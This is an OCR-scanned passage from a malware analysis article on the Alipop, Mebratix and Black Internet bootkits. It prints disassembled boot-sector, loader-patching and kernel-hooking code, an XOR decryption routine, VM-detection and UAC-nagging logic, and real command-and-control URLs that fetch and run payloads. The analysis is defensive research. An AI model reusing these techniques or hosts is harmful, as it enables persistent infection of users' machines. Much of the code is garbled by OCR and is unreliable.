tion) is being searched by signature in the 
buffer with fetched data, received after inter- 
rupt processing: 



seg000:0120 




mov 


di P bx ; di - pointer to buffer with data 
al r SBh ; first byte of the signature 


segOOO :G122 




mov 


segOOO '0124 




eld 






segOOO;G125 










segO0O:G125 loc 


_125 : 




scasb 




segOOO:0125 




repne 




segOOO :G127 




jriz 


short loc_159 




segOOO r0129 




enp 


dword ptr es : [di J r 


74F6BSF0h ; bytes 2-5 


CHTHaTypbi 










segOOO :0131 




j riz 


short loc_125 




segOOO r0133 




enp 


word ptr e&: [di+4] 


, 3021h ; bytes 6-7 


segOOO :0139 




jnz 


short loc_125 




segOOO ;013B 




push 


es 




seg000:013C 




xor 


eax, eax 




seg000:013F 




mov 


es, ax 




segOOO :0141 




rnov 


ax , cs 




segOOO '0143 




shl 


eax, 4 




segOOO :0147 




add 


eax, 200h 




segOOO :014D 




pop 


es 




segOOO ;014E 




mov 


word ptr es: [di -1] 


, 15FFh ; write instruction 


ca 1 1 dword ptr 


[addr] 








segOOO :0154 


mov 


es : [di i-lj , eax 





OSLOADER code is the following set of instructions: 



. text:DQ422B77 
.text:0G422B7<: 
.text:00422B7E 
/text: 004 22 B80 
B text:0Q422B82 
.text:QG422BB2 
.text: 004 22 B82 
. text:00422B89 



loc_422BS2: 



cal I _B I LoadBootDri vers512 

mov esi , eax 

test esi , esi 

jz short loc_422BA3 



cmp _B I Rebootsystein, 0 
jz short loc_422B92 
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This fragment refers to the _BIOsLoad- 
er@12() function. The bytes being modified go 
right after function _BILoadBootDrivers@12() 
call. This function loads drivers of system 
services with SERVICE_BOOT_START trig- 
ger mode into the memory. Code of modifica- 
tion is the call instruction that transfers control 
to resident bootkit's code in reserved base 
memory at the 200h offset. Therefore the 
bootkit's code gets control when the CPU is in 
32-bit protected mode. 

Protected mode code 

The bootkit's protected mode code starts its 
execution with receiving a kernel load ad- 
dress. This address is read from the first re- 



cord in the list of loaded modules. This record 
is a LDR_DATA_TABLE_ENTRY structure. A 
pointer to the list of loaded modules can be 
obtained from the global variable _BILoader- 
Block of the OSLOADER.EXE module. In par- 
ticular, the _BILoaderBlock variable contains a 
pointer to the _LOADER_PARAME- 
TER_BLOCK structure. A copy of this pointer 
is used as a local variable in the code of the 
_BIAIIocateDataTableEntry@16() function. 
The bootkit uses signature to find this section 
of the code. Moreover, the virtual address of 
the memory that is used to load NTLDR and 
other system modules is read from the local 
variable KdDIIBase. Modified function _BIO- 
sLoader® 1 2() refers to this variable by fixed 
offset from ebp: 



segOOl :00000206 mv 
va ri ab 1 e 

segOOl :0000020A and 

segOOl :00000210 c Id 

segOOl :00000211 inov 
search for _B I Loaders lock 
segOOl :00000213 1oc_213: 

segQDl :00000213 scasb 

segOOl :00000214 jnz 

segOOl :00000216 cmp 
of the sign a Lure 

segOOl :0000021c jnz 

segOOl :0000021E nov 
segOOl :00000220 1oc_220: 

segOOl :00000220 scasb 

segOOl :00000221 jnz 

segOOl :O0O0O223 mov 
of loaded modules 

segOOl :00000225 mov 
_ L D R_D ATA_T A B L E_EMRY 

segOOl :O000O227 lodsd 

segOOl :00000228 mov 

segOOl r0000022B call 



edi , Lesp+24iiJ ; edi - value of KdollBase 
edi, OFFFOOOOOh 

al, 0c7h ; First byte of the signature to 
short loc_213 

dword ptr I.ediJ, 400034^161 ; other 4 bytes 

short loc_213 
a I , OAlh 

short loc_220 

esi , L^diJ ; esi - pointer to the list 

esi , Eesi] ; esi - pointer to the first 

ebx, [eax+18h] ; ebx - kernel load address 
sub_2G7 



short loc_220 
esi , Ledi J 

esi , [.esi J 



The procedure sub_267 is used to intercept 
the kernel function nt!loGetCurrentProcess() 
in such a way that its call will transfer control 



to the bootkit's code of the next (third) stage, 
which has to be executed in 32-byte protected 
mode after OS kernel initialization. 



segOOl: 
address 
segOOl : 
segOOl; 
segOOl r 
segOOl: 
segOOl: 
0x267 i 
segOOl: 
segOOl: 
address 
segOOl: 
segOOl: 
segOOl: 
segOOl: 
segOOl: 
segOOl: 
segOOl: 
segOOl: 
loGetcu 



00000267 

0000026S 
0000026D 
00000273 
00000276 
0000027S 



pop 



esi ; Get bootkit's code address by return 



n the header of kernel image over DOS stub 



inov ecx, 37h 
mov |_esi +2B6liJ , ebx 
lea edi , (.ebx-MOhJ 
inov ebp, edi 

rep rnovsb ; copy bootkit's code by offset 0x230- 



0000027A push 

0000027F call 

by a hash of the name 

00000234 xchg 

00000285 sub 

000002 8 B movsd 

0000028C sub 

00000292 movsb 

00000293 mov 
00000297 sub 
00000299 mov 



0CE8C3177h 
GetProcByHash 



Get loGetCurrentProcess 



rrentProcess by its call at nt+0x40 address 



eax, esi 
edi , OAh 

; save first 5 bytes of the function 
edi , 6 

byte ptr [esi -5J , 0E8h 
ebp, esi 

Lesi-4], ebp ; Patching modification of 
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The first call of the nt!loGetCurrentProcess() function is usually performed after kernel initialization 
with the nt!Phase1 Initialization) function: 



fcd> kb 

chi Id ebp Ret Add r Args to child 

f9dc3SfO 80688d7e 819Sc33S SOOSecbS SOOSecbS nt+0x4D 

f9dc3630 8068ac22 S19Sc3ec SOOSecbS 0000000c nt ! Ioplni ti al i zeBui 1 ti nDri v&r+0x260 

f9dc3634 80687b48 80082000 f9dc36b0 00034000 nt ! Ioplni ti al i zeBootDri vers+Ox2d2 

f9dc383c 8068Sfdd 800S2000 00000000 S19ccS3S nt ! Iolni t5ysten+0x712 

f9dc3dac 80Sc6160 800S2000 00000000 00000000 nt ! Phasellni ti al i zati ort+OxSbS 

f9dc3ddc 8054 ldd2 80685628 80082000 00000000 nt ! PepSys temThreadStartup-h0x34 

00000000 00000000 00000000 00000000 00000000 nt!Ki'Thread5tartup+0xl6 

kd> u nt ! ioGetcurrentProcess 
nt ! IoGetcurrentProcess : 

S04ee608 eS338afeff call nt+0x40 [SQ4d7Q4Q] 

804ee60d 008b4044c3cc add byte ptr [ebx-333CBBC0h J , c I 

S04ee613 cc int 3 

B04ee614 cc int 3 

B04ee61S cc int 3 

S04ee616 cc int 3 

S£Mee617 cc int 3 



Bootkit execution after kernel initialization 

The Hook handler nt!loGetCurrentProcess() 
restores the original code of the function and 
calls nt!PsCreateSystemThread() to launch 
the system thread which executes the boot- 
kit's operational code. The operational code 
performs following: 

• Creates a string parameter in the registry 
key 

HKEY_LOCAL_MACHINE\SOFTWARE\Micro 



soft\Windows\CurrentVersion\Run, with value 
C:\WINDOWS\ali.exe to make it possible to 
launch the Trojan after the system launch. 

• Creates C:\WINDOWS\ali.exe file. Its con- 
tent is written into the system from sector 4 of 
the HDD by the installer during the bootkit in- 
stallation. 

• Installs GDT call gate, which makes it possi- 
ble to execute any instructions with maximum 
priority by any user mode code. 



GDT 


Id 


Type 


Address 


Dpi 


Module 


123 [40x3D8) 








Reserved) 


124 ;+0x3EQ) 


OOC 


0x80000 3E8 


DPL_SYSTEM 




125 [40x3E8) 








[Reserved) 


126 ;+0x3F0) 








^Reserved) 



Figure 8. GDT call gate (backdoor). 



Therefore Alipop developers gave up on using 
the traditional method of utilizing a kernel 
mode driver to execute privileged instructions. 
Instead, they used a trick which allowed them 
to utilize a user mode process for the same 
goal. This is a simpler but less stealthy ap- 
proach. 

Also, it is possible that this bootkit was devel- 
oped as a universal tool for execution of any 
malicious software which runs in user mode 
from the boot sector. 



Trojan process 

The main goal of the ali.exe process is to re- 
ceive commands to download and launch 
other malicious software from the server. 

Sending HTTP requests is performed via 
Internet Explorer, which is launched in a hid- 
den window. 
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Process 


PID | CPU | Description 


□ explorer.exe 

rtyj) v M ware 1 ray .exe 
3 VM ware User.exe 


]-?■- Windows Explorer 
I ■ c _ v Mware I ray 
17GS VM ware User 




1776 


□ ^ iexplore.exe 


14GB Internet Explorer 


^ iexplore.exe ^^^H 


I'cl'i Internet Explorer 


"ifmon.exe 


17S0 ;T : _:c:e- 



Figure 9. Trojan process. 



- Hypertext Transfer Protocol 
S get /sms/xxx. i ni HTTP/i.l\r\n 
Accept: */*\r\n 

Accept-Encodi ng : gzi p, clef 1 ate\r\n 

user-Agent: Mozi 11 a/4.0 (compatible; MSIE 7.0; windows NT 5.1; Tri dent/4. 0)\r\n 



Host: list. 577q. coTn\r\n 



connecti on : Keep-Al i ve\r\n 



0040 
0050 
0060 
0070 
0080 
0090 
OOaO 
OObO 
OOcO 
OOdO 
OOeO 
OOfO 



76 76 2e 69 

0a 41 63 63 

63 65 70 74 
7a 69 70 2c 
65 72 2d 41 
61 2f 34 2e 
65 3b 20 4d 

64 6f 77 73 
64 65 6e 74 



6e 69 20 46 

65 70 74 3a 

2d 45 6e 63 

20 64 65 66 

67 65 6e 74 

30 20 26 63 

53 49 45 20 

20 4e 54 20 

2f 34 2 e 30 



54 54 50 2t 
20 2a 2f 2a 
6f 64 69 6e 
6c 61 74 65 
3a 20 4d 6f 
6f 6d 70 61 
37 2e 30 3b 
35 2e 31 3b 
29 Od Oa □ 



31 2e 31 Od 

Od Oa 41 63 

67 3a 20 67 

Od Oa 55 73 

7a 69 6c 6c 

74 69 62 6c 

20 57 69 6e 

20 54 72 69 



8 6f 73 74 3 
20 6c 69 73 74 2e 35 37 37 71 2e 63 6f 6d Od 0 



43 6f 6e 6e 65 63 74 69 
2d 41 6c 69 76 65 Od Oa 



n 



6f 6e 3a 20 4b 65 65 70 
Od Oa 



xx. ini H 
. Accept : 
cept-Enc 
zip, def 
er -Agent 
a/4.0 (c 
e; MSIE 
dows NT 
dent/4. 0 



HQS 

list. 57 7q. corn 



Connecti 
- Al i ve . . 



TTP/1.1. 
*/*■ -AC 

oding: g 
late. . us 
: Mozill 
ompati bl 
7.0; win 
5.1; Tri 
)- ■ 

SB 

on: Keep 



i 



Figure 10. Request configuration file from server. 



The Trojan's ciphered configuration file is 
downloaded from a server with the fixed ad- 
dress http://list.577q.com/sms/xxx.ini and is 



saved in the C:\WINDOWS catalog with the 
win. ini name. An example of configuration file 
content: 



LDownLoad] 

exel=coopen_setup_lD0201 . exe- 

S. 0 1 http ://down I oad . coopen . cn/setup/v5/coopen_&etup_100201 . exe 
exe2=ppLv(pp I i ve) j i xi an_113459_s .exe- 

1. 0| http ://60. 173. i0.28:«21/pptv{ppli ve) jixian_1134S9-S-exe 



[Homepage] 

home=http : //www . 67ku . coin 
[Time] 

DowriLoadiniTi me=120 
PopAdTi me=Z| 
DowriLoadLe 1 ayTi me=l 
RunDe I ayTi me=0 
Fi rstRunExeTinte=2 
Fi rstPopwi dTime=l 
cjve r=Z 
cjaddr= 
[Link] 

Li n kl= I http : //66 . 79 .163. 187 : 5 5 32 5/tu ling. htm I 



Though the Alipop Trojan uses the boot sector 
infection technique, it can be detected and de- 
leted easily because there no methods are 
used to hide the malicious activity. 



The bootkit does not protect its boot sector 
code from disinfection. It is, therefore, possi- 
ble to heal the infected system by manually 
editing the boot record with any 16-bit HEX- 
editor (such as WinHex). 
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Mebratix.b (Ghost Shadow) 

The Mebratix bootkit was mentioned for the 
first time in an entry on the Symantec Security 
Response blog (tinyurl.com/3xedn5j). 

The bootkit's installer (MD5: 

1 b465d5c330d99bdccffd299bf71 01 Of, about 



30 kB) does not have any notable characteris- 
tics. 

Boot code 

Mebratix' boot code is an almost perfect clone 
of the standard Windows boot code. Let's take 
a closer look at the two disassembled codes. 



Windows boot code: 



segQOQ^OOCA mov ax, ZOlh 

interrupt 13h (02 h, read data from disk) 



ah - number of function of 13 Lh 



segOO0:OOcD mov bx r ZcOOh 

segQOQrGODO mov tx P [bp+2J 

points to a record in partition table) 

seg0D0:G0D3 mov dx r Lbp+OJ 

segOOOrOODS i nt 13h 

segOOOrOODS jnb short locret_12B 



al - amount of sectors being read 
Address of buffer for data read 
Number of path and sector (bp 



Number of head and disk 



Mebratix boot code: 



segOOOrOOCA mov ax,, ZOlh 

interrupt 13h (02 h s read data from disk) 



a- 1 



number ot function of 13 Lh 



segOOOrOOCD mov bx F 7C00h 

seg000:00D0 mov cx, 2 

points to a record in partition table) 

seg000:00D3 mov dx r Lbp+OJ 

segOOOrOODS i nt 13h 

segOOOrOODS jnb short locret_12B 



a I - amount of sectors being read 
Address of buffer for data read 
Number of path and sector (bp 



Number of head and disk 



As you can see, Mebratix' boot code differs 
from the standard boot code by arguments of 
mov instruction with offset OODOh from the 
start of the boot code. According to the devel- 
oper's intent, the original code performs the 



reading and transfers control to the first sector 
of the boot partition, whereas the bootkit's 
code transfers control to the second sector 
with the extension of malicious code. 



view mbr.bin - Far 

























IfHl 










;i2 


C:\Fibr.bin 








[0000000000 : 


: 33 


C0 


8£ 


D0 


BC 


00 


7C 


FB 


50 


07 


50 


IF 


FC 


BE 


IB 


7C 


0000000010: 


: BF 


IB 


06 


50 


57 


B9 


E5 


01 


F3 


A4 


CB 


BD 


BE 


07 


Bl 


04 


00Q0Q0Q020: 


: 38 


6E 


00 


7C 


09 


75 


13 


83 


C5 


10 


E2 


F4 


CD 


18 


8B 


F5 


0Q0Q0Q0Q30: 


: 83 


C6 


10 


49 


74 


19 


38 


2C 


74 


F6 


A0 


B5 


07 


B4 


07 


8B 


0000000040 : 


: F0 


AC 


3C 


00 


74 


FC 


BB 


07 


00 


B4 


0E 


CD 


10 


EB 


F2 


88 


0000000050: 


: 4E 


10 


E8 


46 


00 


73 


2A 


FE 


46 


10 


80 


7E 


04 


0B 


74 


0B 


0000000060: 


: 80 


7E 


04 


0C 


74 


05 


A0 


B6 


07 


75 


D2 


80 


46 


02 


06 


83 


0000000070 : 


: 46 


08 


06 


83 


56 


0A 


00 


E8 


21 


00 


73 


05 


A0 


B6 


07 


EB 


0000000080: 


: BC 


81 


3E 


FE 


7D 


55 


AA 


74 


0B 


80 


7E 


10 


00 


74 


C8 


A0 


0000000090: 


: B7 


07 


EB 


A9 


8B 


FC 


IE 


57 


8B 


F5 


CB 


BF 


05 


00 


8A 


56 


00000000A0: 


: 00 


B4 


08 


CD 


13 


72 


23 


8A 


CI 


24 


3F 


98 


8A 


DE 


8A 


FC 


00000000B0 : 


: 43 


F7 


E3 


SB 


Dl 


86 


D6 


Bl 


06 


D2 


EE 


42 


F7 


E2 


39 


56 


00000000C0 : 


: 0A 


77 


23 


72 


05 


39 


46 


08 


73 


1C 


B8 


01 


02 


BB 


00 


7C 


00000000D0 : 


: B9 


02 


00 


BA 


80 


00 


CD 


13 


73 


51 


4F 


74 


4E 


32 


E4 


8A 


00000000E0 : 


: 56 


00 


CD 


13 


EB 


E4 


8A 


56 


00 


60 


BB 


AA 


55 


B4 


41 


CD 


00000000F0 : 


: 13 


72 


36 


81 


FB 


55 


AA 


75 


30 


F6 


CI 


01 


74 


2B 


61 


60 


0000000100: 


: 6A 


00 


6A 


00 


6A 


00 


6A 


02 


90 


90 


6A 


00 


68 


00 


7C 


6A 


0000000110: 


: 01 


6A 


10 


B4 


42 


8B 


F4 


CD 


13 


61 


61 


73 


0E 


4F 


74 


0B 


0000000120: 


: 32 


£4 


8A 


56 


00 


CD 


13 


EB 


D6 


61 


F9 


C3 


49 


6E 


76 


61 


0000000130: 


: 6C 


69 


64 


20 


70 


61 


72 


74 


69 


74 


69 


6F 


6E 


20 


74 


61 


0000000140: 


: 62 


6C 


65 


00 


45 


72 


72 


6F 


72 


20 


6C 


6F 


61 


64 


69 


6E 


0000000150: 


: 67 


20 


6F 


70 


65 


72 


61 


74 


69 


6E 


67 


20 


73 


79 


73 


74 


0000000160: 


: 65 


6D 


00 


4D 


69 


73 


73 


69 


6E 


67 


20 


6F 


70 


65 


72 


61 


iJHelp EJJr 




4 


;xt 




6 






tearchl 


8 



3azdss :ap-PTU_^: 

d^*PUl306*EJ*_-±* 
8n :0u!!J8KaoIt<o 
£<EHti8,to m-'-< 
d-.< tii»- 'HIKeb^ 
NKeF s*_FK_~*fftff 
_~4¥t4 <n-LiO_FO*f 
FD*fU0 et s* H-e 
SS_>_>Uatfi_*> tE 
•ec<iillKoEd£ SU 

'ni!!rttSA$?~S_Sii 
Cva<N+0±*OiBva9U 
Qtfftr£9FQsi-,GB» i 
18 I!!sQ0tN2aS 
U I!!eaSU ^U'AI 
!!r6_uUS u 0oA0t+a l 

J J J jO — J h !j 
GtiK'B<oI!!aasflOttf 
2aSU I!!eOauAInva 
lid partition ta 
ble Error load in 
g operating syst 
en Missi ng op era 
9 10 



Figure 11 . Mebratix boot code (the instruction that differs from the standard boot code is highlighted), 
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The bootkit's code in the second sector of a Then, it copies itself to 9700:0000h and sets a 

disk reserves 63 kB of base memory in the hook for the 13h interrupt: 

same way as the Alipop bootkit. 



segODO :0229 


mov 


si , 533h 




segODO ;022C 


xor 


si , 120h 

; read instruction 




segODO:0230 


1 od SW 


from 0040b: 0013 h (base memory 


size in kB) 








segODO:0231 


sub 


si, 2 




segOOO:0234 


shl 


ax p 6 




segODO :D237 


and 


ax P OFFFh 




segODO :023A 


shr 


ax p 6 

[si ] p ax ; Reserve 


63 ke of a base memory 


segODOr023D 


sub 


segODO:023F 


xor 


eax, eax 




seg000:0242 


mov 


ax P 9700b 




segODO;0245 


mov 


es , ax 




segODO :0247 


assume 


es^nothing 




segODO: 0247 


shl 


eax , 4 




segODO ;024B 


mov 


s i p 7C00 b 




segODO :024E 


xor 


di P di 




segODO :02S0 


mov 


ecx, 100b 




seg0D0r0256 


rep movsw ; copy code of 2 


sector to 9700:0000h 


segOOO;025S 


mov 


es :0Eh , eax 
bx P bx 




segODO:025D 


xor 




segODO:025F 


mov 


east, [bxi-4ch] 




segODO:0263 


mov 


word ptr [bx+4chj p 


0F9h ; set address of llh 


interrupt hand I er 








segODO :026S 


mov 


es : 106h, eax 


; save address of 


original handler 








segODO;026D 


mov 


word ptr [bx+4Eh] r 


es ; set new value of 


handler selector 








segODO:0270 


push 


es 




segODO;0271 


push 


75h ; Transfer of 


control to the code by 7 5 h 


offset 








segODO:0274 


retf 







The next part of the boot code reads 59 sector 
of HDD (starting with sector 3) to the memory 
at 9700:0200h. These sectors contain all the 
other bootkit components. Moreover, sectors 



3 to 6 are ciphered with xor operation with dy- 
namic calculation of key byte at each iteration. 
Below is the fragment of the code that deci- 
phers the sectors. 



segODO ;0297 
seg000r029D 
ca leu I ation 
segODO ;02A3 
(3 sectors) 
segODO r02A9 
segODO r02A9 
segODO :02AC 
seg0D0r02AF 
seg0D0r02B3 
seg000:02B7 



loc_2A9: 



mov esi , 200b 
mov ebx , 3333h 

mov ecx, 600b 



call GetxorKey 

xor Lesi J , al 

add esi , 1 

sub ecx, 1 

jnz short loc_2A9 



Pointer to read data 
start constant for key 

size of data for deciphering 



Gen key for current iteration 



segODO :03C5 GetxorKey proc near ; Key calculation 

segOOOr03C5 imul ebx, 343FDK 

seg0D0r03cc add ebx, 2G9EClh 

segODO r03D3 mov eax, ebx 

segODO r 03 D6 shr eax, lOh 

segODO :03DA and eax, 0 FFh 

seg0D0r03E0 retn 

segODO r03ED GetxorKey endp 



It is possible that the key calculation code was The 13h interrupt handler modifies 

specified in a separate procedure to allow OSLOADER.EXE code in the exact same way 

polymorphic encryption, but spread bootkits as the Alipop bootkit. 
used statically encrypted code. 
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Protected mode code 

The bootkit's protected mode code is called 
from the modified OSLOADER.EXE module 



and is performed to initialize and launch the 
bootkit's kernel mode driver. Let's examine 
this code more thoroughly: 



segOOl :00000604 
segOOl r00000606 
segOOl rOOO 00 60A 
BootDriverLi stHea 
segOOl rOOO 00 60F 
= " : 00000610 
;00000615 
;00000616 
:0000061C 
protected mode co 
segOOl ;00000622 
" " ;00000624 
:00000626 
;00000627 
:00000629 
:0000062A 
;0000062C 
;00000631 
: 00000634 
:00000634 
:00000635 
:0000063A 
:0000063B 
: 00000641 
: 0000064 7 
interrupt handler 
segOOl ;000 00 64A 
segOOl :000 00 64D 
segOOl ;000 00 64E 
memory wri te-prot 
segOOl ;000006S2 
seg001;00000655 
segOOl :0000065C 
interrupt handler 
seg001:00000661 
segOOl ;00000668 
segOOl: 00000669 
segOOl :0000066C 
segOOl ;00000672 
segOOl: 00000674 
segOOl ;0000067A 
segOOl :0000067C 
segOOl ;0000067C 
_ L D R_D ATA_T A B L E. 
seg001;0000067E 
segOOl ;00000680 
segOOl ;00000686 
address from _l_DR 
segOOl r00000689 
module's header 



d variable 



segOOl: 
segOOl: 
segOOl: 
segOOl: 



segOOl: 
segOOl: 
segOOl: 
segOOl: 
segOOl: 
segOOl: 
segOOl: 
segOOl: 
segOOl: 
segOOl: 
segOOl: 
segOOl: 
segOOl: 
segOOl: 



mov 
mov 
and 

push 
cal I 
pop 
and 
or 

de by return address 
mov 
mov 
pop 
test 
pushf 
j nz 
add 
jimp 



loc_634: 



pusha 



ecti on) 



esi , eax 

eax, [esp-4J 

eax, OFFFFFOOOh ; Get address of 

ebx 

ebx 

ebx, OFFFFFOOOh 

ebx, GOOh ; calculate address of bootki^s 

[ebx J , eax ; save BootDriverLi stHead 

eax, esi 

ebx 

eax, eax 

short loc_634 

dword ptr L e sp-i-4 J , 0 

short loc_63 i 1 



call 


5+5 




pop 


ebx 




and 


ebx , 


OFFFFFOOOh 


lea 


ecx , 


large ds:106h 


^nov 


eax , 


[ebx+ecx] ; Get saved address of 13h 


mov 


ecx , 


crO 


push 


ecx 




btr 


ecx. 


lOh ; Reset wp-bit (disable virtual 


mov 


crO, 


ecx 


or 


byte 


ptr ds:0C0000000h , 3 



mov 

mov 
pop 
mov 
or 
mov 
sub 
mov 

loc_67c: 

mov 

entry for specific modu 
cmp 
jz 

mov 

.D ATA_T AB L E_ E N TRY 
Crip 



large ds:4ch, eax ; Restore original 13h 

byte ptr ds :0C0000000h, 20h 
ecx 

crO, ecx ; set reseted WP-bit 

ebx, 6G0h 

eax, [ebxj 

ebx, 600h 

esi . eax 



LesiJ 



esi 
esi 



esi 
le 

esi , eax 
loc_763 

ecx, [esi+lShJ 
word ptr LecxJ ■ 1 ZM ' 



BootDri verLi stHead 
pointer to 

; Get imodu I e boot 
check NZ signature of 



After executing this code, the bootkit searches 
through all the loaded executable modules to 
find a section with 200 or more bytes of free 
space in the end. 



The bootkit's driver loader code is copied in 
the found module (this code is originally lo- 
cated in the HDD's sector 4). 



segOOl :000006C7 loc 6C7: 








segOOl :000006C7 


sub 


edx, 2Bh ; h ( h 




segOOl :000 00 6CA 


mov 


ecx, [edx+BJ 


; ecx - section 


vi rtua 1 si ze 








segOOl :000006CD 


or 


ecx, OFFFh 




segOOl :000006D3 


sub 


ecx, lFFh 




segOOl :000 00609 


add 


ecx, Ledx+OCriJ 


; Add vi rtua 1 Address to 


ecx vi rtua 1 Address 








segOOl :000006DC 


add 


ecx, L^si+dSh] 


; Add modu 1 e loadi ng 


address to ecx 








segOOl :000006DF 


cmp 


dword ptr [ecx] P 0 


; check free space in the 


end of the section 








segOOl :000006E2 


joz 


short loc_67c 




segOOl :000006E4 


mov 


edi , ecx 




segOOl :000006E6 


push 


edi 




segOOl :000006E7 


lea 


esi, [ebx+-600h] 




segOOl :000006ED 


mov 


ecx, 80h 




segOOl :000006F2 


rep 


movsd 


; copy 200h bytes 
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In most cases, bootkits use '.data' to store As you can see from the dump of the mod- 

code. This section belongs to the OS kernel ule's header, there is enough space to inject 

image, loaded into the memory. the loader code in the '.data' section. 



kd> dli -s nt 



SECTION HEADER #5 
.data name 
1£EA0 vi rtua I si ze 
6E800 vi rtua I address 
16F00 size of raw data 
GE800 file pointer to raw data 

0 file pointer to relocation table 
0 file pointer to line numbers 
0 number of relocations 
0 number of line numbers 
C8000040 flags 

initialized Data 
Not Paged 

(no align specified) 
Read write 



To transfer control to the driver loader code, ginning will contain a call for the bootkit's 

the bootkit modifies the ntlPspCreateProc- driver loader instead of the nt!_SEH_prolog() 

ess() kernel function in such a way that its be- function call. 



The nt!PspCreateProcess() function code before modification: 



kd> u nt ! Pspcreateprocess 
nt ! Pspc re ate Process : 
S05d0866 6SIC010000 push 
805d086b 6ScSaS4d50 push 
S05d0870 eSlbb3f6ff ca I I 



llch 

offset nt lobwatchhand I&s-h0x664 
nt!_SEH_pro log 



The nt!PspCreateProcess()function code after modification: 



kd> u nt ! Ps pcreate Process 
nt ! Pspc re ate Process : 
S0 5c6aSc 68 IcO 10000 push 
S05c6a91 6Sb09e4dS0 push 
S05c6a96 eS8af8f7ff ca I I 



HCh 

offset nt !0bwatchHand Ies-h0x664 
80546325 



Since nt!PspCreateProcess() isn't exported by the opcode of the first call instruction (E8h) - 

the kernel, the bootkit searches it by analyzing its argument is the address of the ntlPspCre- 

the code of the exported ntlPsCreateSystem- ateProcess() function: 
ProcessQ process, byte-by-byte searching for 



kd> u nt ! PscreatesystentProcess+Qxa 
nt! PsCreateSyslenfiProcess+Oxa : 

S05dllda SO push eax 

SOSdlldb 50 push eax 

505d_lclc H"35dOc2G7BO push dword ptr [nt ! Pspini ti a I systemProcessnand I e J 

SOSdlleZ ff751Q push dword ptr Lebp+10hJ 

SOSdlleS ff750c push dword ptr [ebp+0chj 

SOSdlleS ff7508 push dword ptr [ebp+8J 

SOSdlleb eS76f6ffff call nt J Pspcreate P rotess 

SOSdllfO 5d pop ebp 
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The nt!PspCreateProcess() call is performed at the initialization of the executive kernel subsystem: 



kd> kb 

childEBP RetAddr Args to child 

S05499aO 8069c0dc 8066fbS0 OOlfOfff 

SQ549a<rC 8D69M19 80078000 60549beS 

S0549a58 8068509c 00000000 80078000 

S0549be8 80691fZ8 00000000 80078000 

60549c3c 8068fa9f 6055Z9aO BG55274D 

00000000 00000000 00000000 00000000 



S0549a24 nt ! PspCreateProcesst-Oxa 
6068509c nt ! Psplni tPhaseO+Ox34e 
60552740 nt ! PElni tsysteni+0xl3 
8003fc00 nt ! Explni ti al i zeExecuti ve-HDx742 
80 549 f 00 nt ! Ki initial izeKe rue l-hOx3b2 
00000000 nt ! KiSy5tein5tartup+0x2bf 



Driver loader 

The code of the bootkit's kernel mode driver 
loader performs the following: 

• Gets the PID of the current process with the 
nt!PsGetCurrentProcessld() function. If the 
received value differs from 4 (the fixed PID 
value for the System process), - the 
nt!_SEH_prolog() call and a return to the 
nt!PspCreatepProcess() is performed. 

• Gets the address of the ntlpsLoadedMod- 
ulesList kernel global variable through signa- 
ture analysis of the ntlKeCapturePersistent- 
ThreadState() function code. 

• Reserves 10000h bytes in the memory for 
the image of bootkit's kernel mode driver with 
the nt!ExAllocatePoolWithTag() function. 

• Copies the headers and the sections of a 
driver into an allocated area of the memory. 



• Restores the modified ntlPspCreateproc- 
ess() function code. 

• Calls the bootkit's driver entry point. 
Driver and payload 

The goal of the bootkit's driver is to inject user 
mode code in the explorer.exe process and 
hook such IRP-requests handlers as 
IRP_MJ_READ/IRP_MJ_WRITE of the disk 
driver Disk.sys (\Driver\Disk). These hooks 
protect disk sectors with the bootkit compo- 
nents from the read or rewrite attempts by an- 
tivirus software. It should be noted that the 
driver code is unstable since, in some cases, 
the Trojan fails to install kernel hooks during 
its installation. 

The user-mode code sends HTTP requests to 
the meifawu.com server. The Trojan configu- 
ration file is loaded from 
http://meifawu.eom/n.txt. 



Destination 




Protocol 


Info 


116. 255. 


134. 227 


HTTP 


GET /count. a5px?i=075deddb0dedee574aea64cf a4926bl2f 7 


192. 166. 


68. 150 


HTTP 


HTTP/1.1 


192. 166. 


66. 150 


HTTP 


[TCP Retransmission] HTTP /I. 1 200 OK 


116. 255. 


134. 227 


HTTP 


GET /n. tXt HTTP/1. 1 


192.168. 


88.150 


HTTP 


HTTP /I. 1 200 OK (text/plain) 


192. 166. 


68. 150 


HTTP 


|_tcp Retransmission] http/1.1 200 ok (text/p fain) 



I I 



Figure 12. Server requests. 



Black Internet Trojan Installer and self-defense 



The Black Internet Trojan bootkit appeared 
only recently, and if we are to judge by the ac- 
tivity on antivirus Web forums, it is both the 
least known and the most widespread of all 
the new bootkits. One of the first sources of 
information about the infection was the 
English-language antivirus forum MajorGeeks, 
and some days later Russian Viruslnfo. 



The bootkit's installer (MD5: 

e3531 022071 5287c5765b273a1 797836, 

about 1 .2 MB) is protected with an unknown 

encrypter. 

The deciphering procedure contains the code 
to detect VMware virtual machines: 
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. text 


004010A3 


push 


101113h ; Address of exception seh- i a 1 d I e r 


.text 


004G1QAD 


push 


I arge 


dword 


ptr fs:0 


.text 


004G1GB4 


push 


eax 




.text 


0G4G1GBS 


mov 


eax , 


337h 




.text 


0G4010BA 


pop 


eax 






.text 


004010BB 


mov 


I arge 


f S'0 P 


esp 


.text 


004010C2 


mov 


eax , 


564D5£6£h ; 'V^Xh' - magic constant 


.text 


004010C7 


mov 


ebx , 


0 




.text 


004010CC 


mov 


ecx , 


OAll 




.text 


004010D1 


xchg 


eax , 
ebx 


ebx 




.text 


004010D2 


push 






.text 


004010D3 


push 


eax 






.text 


004010D4 


pop 


ebx 






.text 


004010DS 


pop 


eax 






. text 


004010D6 


mov 


edx , 


5658h 


Number of VMware backdoor I/O 


po rt 












.text 


004010DB 


i n 


eax , 


dx 


Read data from port. 
On usual machine (not virtual) 



exception 



this instruction generates 



To disable this bootkit's self-defense mechanism, add a line that disables the "VMWare backdoor" to 

the end of the VMWare configuration file (.vmx): 

noni tor_contro 1 . restri ct_backdoor = ''true" 



The bootkit's installer detects its execution 
with limited permissions through the GetTo- 
kenlnformation function call with the TokenE- 
levation parameter. If the execution is per- 
formed under UAC, the installer restarts its 
process in a cycle. 



Therefore, the user will get warnings from the 
security system until he permits the execution 
of the bootkit's installer with maximum per- 
missions. 



// check os version for launch under windows vista and higher 

Getversi on Exw (aversion in formation) ; 

if (Versionlnf ormation . dwMajorVersion >= 6) 

v4 = GetcurrentProcessQ ; 

if (!openProcessToken{v1 , 0x2Q00Su r frTokenhand I e} || 

! GetTokeninformation(TokenHand 1 e , TokenEl evation , &Tokeninformation , 4u P 
AReturnLength) ) 

return 0; 

if ( ! Tokeninf ormati on) 

// current process was launched with limited permissions 
